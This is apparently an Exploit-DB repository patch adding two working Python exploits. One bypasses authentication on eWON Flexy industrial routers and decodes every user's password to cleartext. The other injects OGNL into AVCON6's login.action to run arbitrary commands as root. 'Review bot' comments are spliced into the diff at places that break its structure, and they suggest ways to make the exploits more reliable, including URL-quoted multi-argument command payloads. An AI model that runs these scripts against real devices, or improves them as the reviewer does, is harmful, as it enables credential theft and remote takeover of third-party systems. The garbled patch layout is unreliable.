From e852f6f7990c5f4f2d4d79c165cf65638ec78e21 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 12 Sep 2019 05:02:26 +0000
Subject: [PATCH] DB: 2019-09-12 2 changes to exploits/shellcodes Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection AVCON6 systems management platform - OGNL Remote Command Execution eWON Flexy - Authentication Bypass
---
 exploits/hardware/webapps/47380.py | 89 ++++++++++++++++++++++++++++++
 exploits/java/webapps/47379.py | 59 ++++++++++++++++++++
 files_exploits.csv | 8 ++-
 3 files changed, 153 insertions(+), 3 deletions(-)
 create mode 100755 exploits/hardware/webapps/47380.py
 create mode 100755 exploits/java/webapps/47379.py
diff --git a/exploits/hardware/webapps/47380.py b/exploits/hardware/webapps/47380.py
new file mode 100755
index 000000000..f601ce8e2
--- /dev/null
+++ b/exploits/hardware/webapps/47380.py
@@ -0,0 +1,89 @@
+#! /usr/bin/env python
+'''
+ # Exploit Title: eWON v13.0 Authentication Bypass
+ # Date: 2018-10-12
+ # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
+ # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
+ # [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
+ # Vendor Homepage: https://www.ewon.biz
+ # Version: eWon Firmware 12.2 to 13.0
+ # Tested on: eWon Flexy with Firmware 13.0s0
+
+ Copyright 2019 Photubias(c)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ File name eWON-Flewy-Pwn.py
+ written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+ This script will perform retrieval of clear text credentials for an eWON Flexy router
+ Tested on the eWON Flexy 201 with Firmware 13.0s0
+ Only requires a valid username (default = adm) and
+ this user must have the Rights 'View IO' & 'Change Configuration'
+
+ It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
+ and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0)
+'''
+username = 'adm'
+
+import urllib2,urllib,base64,binascii,os
+
+def decode(encpass):
+ xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
+ def convertPass(password):
+ if (len(password)/2) > 19:
+ print('Error, password can not exceed 19 characters')
+ exit()
+ return hexxor(password, xorString[:len(password)])
+ def hexxor(a, b):
+ return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
+ if encpass.startswith('#_'):
+ encpass = encpass.split('_')[2]
+ coded = base64.b64decode(encpass)
+ codedhex = binascii.hexlify(coded)[:-4]
+ clearpass = binascii.unhexlify(convertPass(codedhex))
+ print('Decoded password: ' + clearpass)
+
+def getUserData(userid, strIP):
+ postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
+ postwsdlist = postwsdlist.replace('|1','|'+str(userid))
+ postdata = {'wsdList' : postwsdlist}
+ b64auth = base64.b64encode(username+':').replace('=','')
+ result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
+ resultarr = result.split('","')
+ if len(resultarr) == 20:
+ fname = str(resultarr[1])
+ lname = str(resultarr[2])
+ usern = str(resultarr[3])
+ if len(usern) == 0:
+ return True
+ encpassword = resultarr[4]
+ print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
+ decode(encpassword)
+ print('---')
+ return True
+ else:
+ return True
+
+strIP = raw_input('Please enter an IP [10.0.0.53]: ')
+if strIP == '': strIP = '10.0.0.53'
+print('---')
+
+for i in range(20):
+ if not getUserData(i, strIP):
+ print('### That\'s all folks ;-) ###')
+ raw_input()
+ exit(0)
+
+raw_input('All Done')
\ No newline at end of file
diff --git a/exploits/java/webapps/47379.py b/exploits/java/webapps/47379.py
new file mode 100755
index 000000000..f82332c1e
--- /dev/null
+++ b/exploits/java/webapps/47379.py
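Review bot: `getUserData` returns True on every path (inside the `len(resultarr) == 20` branch, after decoding, and in the `else`), so the `if not getUserData(i, strIP)` test in the `range(20)` loop can never fire and the `That's all folks` exit is dead code; the `urllib2.urlopen` call also has no timeout and no exception handling, so a device on 13.1s0 or later (where the header says the bypass is fixed) presumably answers 401 and the run dies in an `HTTPError` traceback instead of reporting an unexploitable target. I would wrap the request, return False on a failed request so the loop's early exit actually does something, and bound it with a timeout so an unreachable IP does not hang the scan. The empty-password Basic header built from `base64.b64encode(username+':')` is the bypass itself and is sent over plain `http://`; a one-line comment on that line would tell a reader why no password is ever prompted for. `decode` should likewise say that its 19-character ceiling is the 38-hex-digit `xorString`, and that it calls `exit()` rather than returning, which aborts the whole run on a single over-long password.
```python
def getUserData(userid, strIP):
    # … unchanged: build postwsdlist / postdata / b64auth …
    try:
        result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth}), timeout=10).read()
    except (urllib2.HTTPError, urllib2.URLError) as e:
        print('Request for user ' + str(userid) + ' failed: ' + str(e))
        return False
    # … unchanged: split result, print user, decode password …
```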
@@ -0,0 +1,59 @@
+# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
+# Date: 10/09/2018
+# Exploit Author: Nassim Asrir
+# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
+# CVE: N\A
+# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
+# Thanks to: Otmane Aarab
+# Example below:
+# python ./rce.py http://server:8080/ id
+# Testing Target: http://server:8080/
+# uid=0(root) gid=0(root)
+# Vendor: http://www.epross.com/
+# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing
+# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
+# I am not responsible for any wrong use.
+######################################################################################################
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import httplib
+
+
+def exploit(url, cmd):
+ payload = 'login.action?redirect:'
+ payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
+ payload += 'start(),%23b%3d%23a.getInputStream(),'
+ payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
+ payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
+ payload += '.read(%23e),%23matt%3d%23context.'
+ payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
+ payload += '%23matt.getWriter().println(%23e),%23matt.'
+ payload += 'getWriter().flush(),%23matt.getWriter()'
+ payload += '.close()}'
+
+
+ try:
+ headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
+ request = urllib2.Request(url+payload, headers=headers)
+ page = urllib2.urlopen(request).read()
+ except httplib.IncompleteRead, e:
+ page = e.partial
+
+ print(page)
+ return page
+
+
+if __name__ == '__main__':
+ import sys
+ if len(sys.argv) != 3:
+ print("[*] struts2_S2-045.py http://target/ id")
+ else:
+ print('[*] Avcon6-Preauh-Remote Command Execution')
+ url = sys.argv[1]
+ cmd = sys.argv[2]
+ print("[*] Executed Command: %s\n" % cmd)
+ print("[*] Target: %s\n" % url)
+ exploit(url, cmd)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 68d818a69..fc0640aee 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
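Review bot: `cmd` is spliced raw into the OGNL `new java.lang.String[]{"…"}` literal in the second `payload +=` line of `exploit`, so the whole string becomes the single argv element handed to `ProcessBuilder` and is never percent-encoded — `id` works, but a command with arguments is looked up as one executable name, and a space, `"`, `&` or `#` in it likely corrupts the request line or the OGNL expression. Building the array from the split command with each element URL-quoted fixes both: `argv = '%22,%22'.join(urllib.quote(a, safe='') for a in cmd.split())` followed by `payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+argv+'%22})).'`, with `import urllib` added next to `import urllib2`. `url+payload` also assumes the caller passes a trailing slash (the header example does, the usage line does not say so), and that usage line prints `struts2_S2-045.py` rather than this script's name. The `redirect:${…}` prefix is the classic Struts 2 `redirect:` OGNL injection, so the `CVE: N\A` header line is probably incomplete — citing the underlying Struts advisory would tell readers what `login.action` is actually vulnerable to, and the `#!/usr/bin/python` line should move to line 1, since in the 18th line it does nothing and the file is committed with mode 100755.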
@@ -41714,9 +41714,9 @@ id,file,description,date,author,type,platform,port
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
 47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
 47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
-47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
-47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
-47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,80
+47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple,
+47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,xerubus,webapps,multiple,
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,xerubus,webapps,multiple,80
 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80
 47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
 47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,80
@@ -41724,3 +41724,5 @@ id,file,description,date,author,type,platform,port
 47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80
 47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80
 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
+47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
+47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
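Review bot: The new 47380 row's description, `eWON Flexy - Authentication Bypass`, drops both the affected range the exploit header gives (`eWon Firmware 12.2 to 13.0`, bypass fixed in 13.1s0) and the second issue the script actually exploits, the reversible password encoding that yields cleartext credentials for every user (fixed in 13.3s0). Anyone searching the index by firmware version or for the credential-disclosure bug will miss it; something like `"eWON Flexy 12.2 < 13.1s0 - Authentication Bypass / Cleartext Credential Disclosure"` follows the versioned title convention the neighbouring rows use. The 47379 row is consistent with its exploit header as far as this hunk shows.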